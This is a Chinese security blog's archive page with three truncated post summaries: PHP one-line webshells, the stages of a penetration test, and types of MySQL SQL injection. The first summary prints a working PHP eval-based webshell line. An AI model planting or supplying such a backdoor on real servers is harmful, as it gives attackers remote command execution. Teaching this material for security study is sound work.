02 2020 档案
摘要:一句话木马书写:为什么是一句话木马,因为他可以通过函数接收指定的参数来让我们的操作系统执行指定的命令 1.eval函数 <?php eval($_REQUEST['a']);?> 2.assert函数(php官方在php7中更改了assert函数。在php7.0.29之后的版本不支持动态调用。也就是
阅读全文
摘要:标准渗透测试流程:1.前期交互阶段 2.情报收集阶段 3.威胁建模阶段 4.漏洞分析阶段 5.渗透攻击阶段 6.后渗透阶段 7.报告阶段 1.前期交互阶段 确定测试的范围、目标、以及可能的特殊需求 渗透测试的目标: 预期达到的效果和低腰效果 例: 这次渗透测试的商业需求是什么 这次测试时出于监督审核
阅读全文
摘要:sql注入的原理以及怎么预防sql注入(请参考上一篇文章) https://www.cnblogs.com/KHZ521/p/12128364.html (本章主要针对MySQL数据库进行注入) sql注入的分类: 根据注入类型分类: 1.union联合注入 2.报错注入 3.盲注 布尔类型盲注 延
阅读全文
